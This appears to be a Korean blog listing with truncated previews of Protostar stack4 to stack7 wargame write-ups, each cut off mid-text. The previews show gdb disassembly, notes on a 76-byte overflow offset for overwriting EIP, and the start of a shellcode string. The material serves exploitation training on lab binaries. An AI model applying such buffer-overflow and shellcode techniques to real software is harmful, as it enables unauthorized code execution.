stack6,7

(gdb) disas main
Dump of assembler code for function main:
0x080484fa :push ebp
0x080484fb :mov ebp,esp
0x080484fd :and esp,0xfffffff0
0x08048500 :call 0x8048484 //바로 점프
0x08048505 :mov esp,ebp
0x08048507 :pop ebp
0x08048508 :ret
End of assembler dump.
(gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 :push ebp
0x08048485 :mov ebp,esp
0x08048487 :sub esp,0x68 //0x68byte 할당
0x0804848a ..

stack5

0x080483c4 :push ebp
0x080483c5 :mov ebp,esp
0x080483c7 :and esp,0xfffffff0
0x080483ca :sub esp,0x50
0x080483cd :lea eax,[esp+0x10]
0x080483d1 :mov DWORD PTR [esp],eax
0x080483d4 :call 0x80482e8
0x080483d9 :leave
0x080483da :ret

뭐 아까하고 비슷하네요. 버퍼, 더미, SFP까지 총 76byte 있고 EIP를 조작하는 문제네요. call 직전에 버퍼 주소(esp+0x10)만 인자로 넘기고 길이는 넘기지 않기 때문에, 입력 길이를 제한하지 않으면 버퍼 밖까지 덮어쓰게 됩니다. 단지 EIP를 쉘코드가 있는 주소로 점프시켜 root를 따야 할 것 같습니다. 쉘코드는 "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\..

stack4

(gdb) disas main
Dump of assembler code for function main:
0x08048408 :push ebp
0x08048409 :mov ebp,esp
0x0804840b :and esp,0xfffffff0
0x0804840e :sub esp,0x50
0x08048411 :lea eax,[esp+0x10] //입력받은 값을 저장할 버퍼
0x08048415 :mov DWORD PTR [esp],eax
0x08048418 :call 0x804830c
0x0804841d :leave
0x0804841e :ret
End of assembler dump.
(gdb) disas win
Dump of assembler code for function win:
0x080483f4 :push ebp
0x080..